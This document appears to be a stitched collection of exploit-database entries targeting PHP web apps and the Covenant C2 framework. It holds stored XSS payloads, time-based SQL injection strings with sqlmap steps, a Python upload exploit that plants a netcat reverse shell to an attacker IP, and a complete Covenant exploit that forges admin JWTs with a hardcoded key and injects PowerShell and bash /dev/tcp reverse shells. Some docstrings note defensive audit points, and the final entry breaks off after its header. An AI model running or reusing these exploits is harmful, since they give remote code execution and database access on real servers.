# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10
==> Stored Cross-Site Scripting XSS:
An attacker uses Stored XSS to inject malicious content (referred to as
the payload), most often JavaScript code, into the target application. If
there is no input validation, this malicious code is permanently stored
(persisted) by the target application, for example within a database. For
example, an attacker may enter a malicious script into a user input field
such as a blog comment field or in a forum post.
When a victim opens the affected web page in a browser, the XSS attack
payload is served to the victim’s browser as part of the HTML code (just
like a legitimate comment would). This means that victims will end up
executing the malicious script once the page is viewed in their browser.
==> Attack Vector:
This vulnerability lets an attacker inject the XSS payload in the
Admin profile section; each time the admin visits any other section of
the application the XSS triggers, and the attacker can steal the
cookie, depending on the crafted payload.
==> Vulnerable Parameters:
"Admin name" parameter
==> Steps for reproduce:
1) Go to http://localhost/covid-tms/login.php
and log in as an Admin (#Username: admin #Password: Test@123).
2) Click on (Admin --> Profile). Enter the payload in
Admin name = <script>alert(1337)</script>
Click on submit.
3) Now, whichever section of the application admin visits the payload gets executed successfully.
# Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 28-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# --- Proof of concept --- #
#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
def file_upload(target_ip, attacker_ip, attacker_port):
    """POST a PHP file to the settings endpoint without any authentication.

    The request goes to ``/cts_qr/classes/SystemSettings.php?f=update_settings``
    with no cookie or credential, which is the missing authorization check
    this PoC demonstrates; the server-side fix is to require an authenticated
    admin session on that endpoint and to restrict the ``img`` upload to
    image types (extension and content sniffing, not the client-supplied
    Content-Type).

    Args:
        target_ip: host of the vulnerable application.
        attacker_ip: interpolated into the uploaded file's contents.
        attacker_port: interpolated into the uploaded file's contents.

    Returns:
        None when the response body is ``'1'``; otherwise calls ``exit()``.
    """
    # Numeric prefix so repeated runs do not reuse one file name; the suffix
    # keeps the .php extension, which the endpoint evidently does not reject.
    random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
    # File contents; per the author's note in trigger_shell the server
    # executes this once the file is requested as the login-page image.
    revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
    # 'name' is an ordinary settings field; 'img' carries the file with a
    # client-chosen content type that the server apparently trusts.
    m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')})
    print("(+) Uploading php reverse shell..")
    r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
    # The script treats a bare '1' response body as success.
    if r1.text == '1':
        print("(+) File upload seems to have been successful!")
        return None
    else:
        print("(-) Oh no, the file upload seems to have failed!")
        # NOTE(review): exit() with no argument exits with status 0, so a
        # failed upload is indistinguishable from success by exit code.
        exit()
def trigger_shell(target_ip):
    """GET the login page so the server includes the previously uploaded file.

    Per the author's notes below, the uploaded file is treated as the site
    image embedded in the login page, so a plain unauthenticated GET is
    enough to make the server execute it. The response is not inspected.

    Args:
        target_ip: host of the vulnerable application.

    Returns:
        None.
    """
    print("(+) Now trying to trigger our shell..")
    #The file we uploaded previously is expected to be an image that the web app tries to embed into the login page.
    #So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name.
    r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip))  # response body unused
    return None
def main():
    """Parse the three positional arguments and run upload then trigger.

    Exits with status -1 when the argument count is wrong; otherwise the
    arguments are passed through as strings (the port is never converted
    to an int — it is only interpolated into text).
    """
    if len(sys.argv) != 4:
        print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
        print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
        sys.exit(-1)
    target_ip = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = sys.argv[3]
    # file_upload exits the process itself on failure, so trigger_shell only
    # runs after a response of '1'.
    file_upload(target_ip, attacker_ip, attacker_port)
    trigger_shell(target_ip)
    print("\n(+) done!")
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website: https://xthaz.fr/
# Date: 2022-09-11
# Vendor Homepage: https://cobbr.io/Covenant.html
# Software Link: https://github.com/cobbr/Covenant
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website: https://blog.null.farm
## References:
## - https://blog.null.farm/hunting-the-hunters
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
# !/usr/bin/env python3
# encoding: utf-8
import jwt # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request # pip3 install requests
from subprocess import run
from pwn import remote, context # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time
def check_requirements():
    """Abort with status -1 unless the Mono C# compiler ``mcs`` is on PATH."""
    if which("mcs") is not None:
        return
    print("Please install the mono framework in order to compile the payload.")
    print("https://www.mono-project.com/download/stable/")
    exit(-1)
def random_hex(length):
    """Return ``length`` lowercase hex digits, each drawn with ``random.choice``.

    Uses the non-cryptographic ``random`` module; fine for throwaway names,
    not for anything secret.
    """
    hex_digits = "0123456789abcdef"
    picked = []
    while len(picked) < length:
        picked.append(random.choice(hex_digits))
    return "".join(picked)
def request_api(method, token, route, body=""):
    """Send one JSON request to ``{args.target}/api/{route}`` with a bearer token.

    ``args`` is the module-level argparse namespace assigned in ``__main__``;
    this function is not usable before that.

    Args:
        method: HTTP verb passed straight to ``requests.request``.
        token: JWT placed in the ``Authorization: Bearer`` header.
        route: path under ``/api/``.
        body: JSON-serialised request body (``""`` sends an empty string).

    Returns:
        The ``requests`` Response unchanged; callers check ``.ok`` / ``.json()``.
    """
    # verify=False accepts any TLS certificate, and the urllib3 warning about
    # that is silenced here on every call.
    warnings.simplefilter('ignore', InsecureRequestWarning)
    return request(
        method,
        f"{args.target}/api/{route}",
        json=body,
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        },
        verify=False
    )
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
    """Forge a Covenant API token signed with the static HS256 key below.

    The signing key is hard-coded in this script: the weakness (see the
    references in the header) is that affected Covenant builds sign API
    tokens with a fixed secret, so anyone who knows it can mint a token with
    the Administrator role without credentials. A server that uses a
    per-install signing key presumably rejects these tokens — TODO confirm
    against the fixed versions.

    Args:
        username: placed in ``sub``; must name an existing user for the
            impersonation step in ``__main__``.
        userid: value of the nameidentifier claim. NOTE: the default is an
            f-string evaluated once at definition time, so every call that
            omits it reuses the same GUID for the life of the process.

    Returns:
        The encoded JWT string.
    """
    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
    payload_data = {
        "sub": username,
        # Constant token id: if the server logs jti/iss/aud, this fixed value
        # is a usable indicator when auditing for forged tokens.
        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
            "User",
            "Administrator"
        ],
        "exp": int(time()) + 360,  # six-minute lifetime
        "iss": "Covenant",
        "aud": "Covenant"
    }
    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
    return token
def get_id_admin(token, json_roles):
    """Resolve the Administrator role to ``(username, user_id)`` via the API.

    Three lookups in sequence (role id, user-role mapping, user record), each
    written as ``for``/``else``: the ``else`` branch runs only when the loop
    finishes without ``break``/``return``, i.e. nothing matched, and exits
    the process with -1.

    Args:
        token: bearer token accepted by ``request_api``.
        json_roles: decoded body of ``GET /api/roles`` (list of dicts with
            ``name`` and ``id``).

    Returns:
        ``(username_admin, id_admin_user)`` for the first user holding the
        Administrator role.
    """
    id_admin = ""
    for role in json_roles:
        if role["name"] == "Administrator":
            id_admin = role["id"]
            print(f"\t[*] Found the admin group id : {id_admin}")
            break
    else:
        print("\t[!] Did not found admin group id, quitting !")
        exit(-1)
    id_admin_user = ""
    json_users_roles = request_api("get", token, f"users/roles").json()
    # First user mapped to the admin role wins; others are ignored.
    for user_role in json_users_roles:
        if user_role["roleId"] == id_admin:
            id_admin_user = user_role["userId"]
            print(f"\t[*] Found the admin user id : {id_admin_user}")
            break
    else:
        print("\t[!] Did not found admin id, quitting !")
        exit(-1)
    json_users = request_api("get", token, f"users").json()
    for user in json_users:
        if user["id"] == id_admin_user:
            username_admin = user["userName"]
            print(f"\t[*] Found the admin username : {username_admin}")
            return username_admin, id_admin_user
    else:
        print("\t[!] Did not found admin username, quitting !")
        exit(-1)
def compile_payload():
    """Write a small C# source file, compile it with ``mcs``, return the DLL base64.

    Reads the module-level ``args`` (``os``, ``lhost``, ``lport``) to pick and
    parameterise the command the DLL runs via ``Process.Start``. Temporary
    files live under ``/tmp/<8 hex chars>.cs`` / ``.dll`` and are deleted
    only on the success path — on a compiler error the ``.cs`` file is left
    behind (the ``exit(-1)`` happens before ``remove``).

    Returns:
        The compiled assembly as a base64 string.
    """
    if args.os == "windows":
        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
    else:
        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
    # `payload` is spliced in as the two string arguments of Process.Start;
    # lhost/lport are inserted verbatim, unquoted.
    dll = """using System;
using System.Reflection;
namespace ExampleDLL{
public class Class1{
public Class1(){
}
public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);
}
}
}
"""
    temp_dll_path = f"/tmp/{random_hex(8)}"
    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")
    compilo_path = which("mcs")  # presence already checked by check_requirements
    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
    if compilation.returncode:
        print("\t[!] Error when compiling DLL, quitting !")
        exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
    remove(temp_dll_path + ".cs")
    remove(temp_dll_path + ".dll")
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded
def generate_wrapper(dll_encoded):
    """Return C# source for a ``MessageTransform`` class embedding ``dll_encoded``.

    The class keeps the interface Covenant expects from a profile's message
    transform (``Transform``/``Invert`` as base64 pass-throughs) but, on
    every ``Transform`` call, first loads the embedded assembly and invokes
    ``Main`` on each of its types. All exceptions are swallowed by the two
    empty ``catch {}`` blocks, so a failure is invisible to the server.
    Defensively: any profile whose MessageTransform calls ``Assembly.Load``
    or ``Activator.CreateInstance`` deserves review.

    Args:
        dll_encoded: base64 assembly from ``compile_payload``.

    Returns:
        The C# source as a string.
    """
    wrapper = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = \"""" + dll_encoded + """\";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { \"\" } };
try {
type.GetMethod(\"Main\").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}
public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}"""
    return wrapper
def upload_profile(token, wrapper):
    """Create an HTTP listener profile whose ``messageTransform`` is ``wrapper``.

    The rest of the body is a conventional-looking profile (URLs, headers,
    ``{DATA}`` placeholders); the ``httpPostRequest`` template and the
    ``Cookie`` header here are what ``trigger_exploit``/``send_exploit``
    reproduce on the wire later. From the defender's side, profile creation
    through ``POST /api/profiles/http`` by an Administrator token is the
    event to audit — the transform source is stored, and the page's flow
    relies on the server compiling it.

    Args:
        token: Administrator bearer token.
        wrapper: C# source from ``generate_wrapper``.

    Returns:
        The new profile's ``id``; exits with -1 if the request is not ``ok``.
    """
    body = {
        'httpUrls': [
            '/en-us/index.html',
            '/en-us/docs.html',
            '/en-us/test.html'
        ],
        'httpRequestHeaders': [
            {'name': 'User-Agent',
             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
                      'Safari/537.36'},
            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
        ],
        'httpResponseHeaders': [
            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
        ],
        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
        'httpGetResponse': '{DATA}',
        'httpPostResponse': '{DATA}',
        'id': 0,
        'name': random_hex(8),  # random so repeated runs do not collide on name
        'description': '',
        'type': 'HTTP',
        'messageTransform': wrapper
    }
    response = request_api("post", token, "profiles/http", body)
    if not response.ok:
        print("\t[!] Failed to create the listener profile, quitting !")
        exit(-1)
    else:
        profile_id = response.json().get('id')
        print(f"\t[*] Profile created with id {profile_id}")
        print("\t[*] Successfully created the listener profile")
        return profile_id
def generate_valid_listener_port(impersonate_token, tries=0):
    """Pick a port in 8000–8250 that no existing listener already binds.

    Queries ``GET /api/listeners`` on every attempt and retries recursively
    up to 10 times on a collision.

    Args:
        impersonate_token: Administrator bearer token.
        tries: recursion depth so far.

    Returns:
        The chosen port when the first attempt is free.
        NOTE(review): the recursive call on a collision is not ``return``ed,
        so any retry path makes this function return ``None``, which the
        caller then uses as ``bindPort``.
    """
    if tries >= 10:
        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
        exit(-1)
    port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT
    listeners = request_api("get", impersonate_token, "listeners").json()
    port_used = []
    for listener in listeners:
        port_used.append(listener["bindPort"])
    if port in port_used:
        print(f"\t[!] Port {port} is already taken by another listener, retrying !")
        generate_valid_listener_port(impersonate_token, tries + 1)
    else:
        print(f"\t[*] Port {port} seems free")
        return port
def get_id_listener_type(impersonate_token, listener_name):
    """Look up the id of the listener type called ``listener_name``.

    Args:
        impersonate_token: Administrator bearer token.
        listener_name: value matched against each type's ``name`` field.

    Returns:
        The matching ``id``; exits with -1 if ``GET /api/listeners/types``
        fails. Falls off the end and returns ``None`` when no type matches,
        which the caller does not check.
    """
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
        print("\t[!] Failed to get the listener type, quitting !")
        exit(-1)
    else:
        for listener_type in response.json():
            if listener_type["name"] == listener_name:
                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
                return listener_type["id"]
def generate_listener(impersonate_token, profile_id):
    """Create an active HTTP listener on all interfaces using ``profile_id``.

    The listener is plain HTTP (``useSSL`` false) bound to ``0.0.0.0`` on a
    port from ``generate_valid_listener_port``; ``send_exploit`` later
    connects to that port on the target host directly, so the port must be
    reachable from this script. A new listener appearing with a freshly
    created profile is the server-side trace of this step.

    Args:
        impersonate_token: Administrator bearer token.
        profile_id: id returned by ``upload_profile``.

    Returns:
        ``(listener_id, listener_port)``; exits with -1 if the POST is not ``ok``.
    """
    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    data = {
        'useSSL': False,
        'urls': [
            f"http://0.0.0.0:{listener_port}"
        ],
        'id': 0,
        'name': listener_name,
        'bindAddress': "0.0.0.0",
        'bindPort': listener_port,
        'connectAddresses': [
            "0.0.0.0"
        ],
        'connectPort': listener_port,
        'profileId': profile_id,
        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
        'status': 'Active'
    }
    response = request_api("post", impersonate_token, "listeners/http", data)
    if not response.ok:
        print("\t[!] Failed to create the listener, quitting !")
        exit(-1)
    else:
        print("\t[*] Successfully created the listener")
        listener_id = response.json().get("id")
        return listener_id, listener_port
def create_grunt(impersonate_token, data):
    """Return the ``stagerCode`` of a binary launcher for the given config.

    Tries ``PUT /api/launchers/binary`` first and falls back to ``POST`` with
    the same body when the returned ``stagerCode`` is empty; exits with -1
    if both come back empty. Both calls index ``["stagerCode"]`` directly,
    so a non-JSON or differently shaped response raises instead.

    Args:
        impersonate_token: Administrator bearer token.
        data: launcher configuration dict (see ``get_grunt_config``).

    Returns:
        The stager source as a string.
    """
    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
    if stager_code == "":
        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
        if stager_code == "":
            print("\t[!] Failed to create the grunt payload, quitting !")
            exit(-1)
    print("\t[*] Successfully created the grunt payload")
    return stager_code
def get_grunt_config(impersonate_token, listener_id):
    """Generate a launcher for ``listener_id`` and scrape its AES key and GUID prefix.

    The two values are pulled out of the generated stager source with
    regexes, so they depend on the exact text the server emits: the key is
    the 40–50 character base64 argument of ``FromBase64String(@"...")`` and
    the prefix is the ``aGUID = @"..."`` literal. Either regex failing to
    match exits with -1.

    Args:
        impersonate_token: Administrator bearer token.
        listener_id: id from ``generate_listener``.

    Returns:
        ``(aes_key, guid_prefix)`` as strings.
    """
    data = {
        'id': 0,
        'listenerId': listener_id,
        'implantTemplateId': 1,
        'name': 'Binary',
        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
        'type': 'binary',
        'dotNetVersion': 'Net35',
        'runtimeIdentifier': 'win_x64',
        'validateCert': True,
        'useCertPinning': True,
        'smbPipeName': 'string',
        'delay': 0,
        'jitterPercent': 0,
        'connectAttempts': 0,
        'launcherString': 'GruntHTTP.exe',
        'outputKind': 'consoleApplication',
        'compressStager': False
    }
    stager_code = create_grunt(impersonate_token, data)
    # Group 1 of each pattern is the value; `.` before the class in the key
    # pattern consumes one extra leading character.
    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not aes_key or not guid_prefix:
        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
        exit(-1)
    aes_key = aes_key.group(1)
    guid_prefix = guid_prefix.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix
def aes256_cbc_encrypt(key, message):
    """Encrypt ``message`` with AES-CBC under the base64 ``key``, then HMAC-SHA256 it.

    The same raw key bytes are used for the cipher and for the MAC, and the
    MAC covers the ciphertext only (not the IV). The IV is 16 random bytes
    from ``os.urandom``; the plaintext is PKCS#7-padded to 16 bytes.

    Args:
        key: base64-encoded AES key.
        message: text to encrypt (UTF-8 encoded here).

    Returns:
        ``(ciphertext, iv, hmac_digest)`` as bytes.
    """
    raw_key = base64.b64decode(key)
    iv = urandom(16)
    padded = pad(message.encode(), 16)
    ciphertext = AES.new(raw_key, AES.MODE_CBC, iv).encrypt(padded)
    mac = HMAC.new(raw_key, digestmod=SHA256)
    mac.update(ciphertext)
    return ciphertext, iv, mac.digest()
def trigger_exploit(listener_port, aes_key, guid):
    """Send one encrypted message to the new listener so its profile transform runs.

    ``message`` is an RSA public key in .NET ``RSAKeyValue`` XML, encrypted
    with the scraped AES key and wrapped in the GUID/IV/EncryptedMessage/HMAC
    envelope; the form body reuses the ``i=…&data={DATA}&session=…``
    template from ``upload_profile`` with ``{DATA}`` replaced by the
    URL-safe base64 of the JSON. The request is tried with a ``Cookie``
    header first and then, on failure, with ``Cookies``.

    Args:
        listener_port: port chosen in ``generate_listener``.
        aes_key: base64 key from ``get_grunt_config``.
        guid: GUID prefix plus 10 random hex characters (see ``__main__``).

    Returns:
        None; outcome is only printed.
    """
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    data = {
        "GUID": guid,
        "Type": 0,
        "Meta": '',
        "IV": base64.b64encode(iv).decode(),
        "EncryptedMessage": base64.b64encode(ciphered).decode(),
        "HMAC": base64.b64encode(signature).decode()
    }
    json_data = json.dumps(data).encode("utf-8")
    # Must match the profile's httpPostRequest template byte for byte apart from {DATA}.
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
    if send_exploit(listener_port, "Cookie", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
    else :
        print("\t[!] Exploit failed, retrying")
        if send_exploit(listener_port, "Cookies", guid, payload):
            print("\t[*] Exploit succeeded, check listener")
        else:
            print("\t[!] Exploit failed, quitting")
def send_exploit(listener_port, header_cookie, guid, payload):
    """Hand-write one HTTP/1.1 POST to the listener over a raw TCP socket.

    Uses pwntools ``remote`` instead of ``requests`` so the request line,
    headers and body are sent exactly as written (the profile matches on
    URL, User-Agent and the cookie header). Reads the module-level
    ``IP_TARGET`` set in ``__main__``. Note ``sendline`` appends a newline
    after the body, and a single ``recv()`` is assumed to contain the status
    line — presumably fine for a short response; verify if this flakes.

    Args:
        listener_port: port the listener binds.
        header_cookie: header name to carry the session GUID (``Cookie`` or ``Cookies``).
        guid: value placed in ``ASPSESSIONID``.
        payload: URL-encoded form body; ``Content-Length`` is computed from it.

    Returns:
        True when the response contains ``HTTP/1.1 200 OK``, else False.
    """
    context.log_level = 'error'
    request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
    sock = remote(IP_TARGET, listener_port)
    sock.sendline(request)
    response = sock.recv().decode()
    sock.close()
    if "HTTP/1.1 200 OK" in response:
        return True
    else:
        return False
# Entry point: argument parsing, then the exploit chain in order. Every
# helper exits the process itself on failure, so there is no error handling
# here.
if __name__ == "__main__":
    check_requirements()
    parser = argparse.ArgumentParser()
    parser.add_argument("target",
                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
    parser.add_argument("os",
                        help="Operating System of the target",
                        choices=["windows", "linux"])
    parser.add_argument("lhost",
                        help="IP of the machine that will receive the reverse shell")
    parser.add_argument("lport",
                        help="Port of the machine that will receive the reverse shell")
    # Module globals read elsewhere: ``args`` by request_api/compile_payload,
    # ``IP_TARGET`` by send_exploit.
    args = parser.parse_args()
    IP_TARGET = urlparse(args.target).hostname
    print("[*] Getting the admin info")
    # A forged token for a throwaway username is already accepted by the
    # roles/users endpoints; it is only used to learn the real admin's
    # username and id, after which a second token is forged for that user.
    sacrificial_token = craft_jwt("xThaz")
    roles = request_api("get", sacrificial_token, "roles").json()
    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
    print("[*] Generating payload")
    dll_encoded = compile_payload()
    wrapper = generate_wrapper(dll_encoded)
    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)
    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)
    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    # The GUID is the scraped prefix plus 10 random hex characters.
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: http://sourceforge.net/projects/coursems
# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
# Version: 2.1
# Tested on: Ubuntu 20.04
POST /coursems/admin/add_jobs.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/coursems/admin/add_jobs.php
Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Upgrade-Insecure-Requests: 1
name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
Anyone who visits http://localhost/coursems/add_user.php triggers execution of the stored XSS.
source: https://www.securityfocus.com/bid/63435/info
Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected.
http://example.com/add_user.php (POST - params: work_tel, lastname, email, gmc_reg, job_title, firstname)
http://example.com/login.php (POST - params: username)
http://example.com/auth.php (POST - params: username)
http://example.com/forgotten_password.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
http://example.com/add_user.php
(POST - email)
email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
http://example.com/login.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+
# # # # #
# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
# Demo: http://courierv6.couriersoftwares.com/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
# user:username
# user:hub_name
# user:password
# user:hidden_pass
# user:entrydate
# user:onlinestatus
# user:status
# Etc...
# # # # #
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request to the "/ajax.php?action=save_branch" page in Burp Suite.
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. The injection succeeds and discloses the contents of all databases.
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
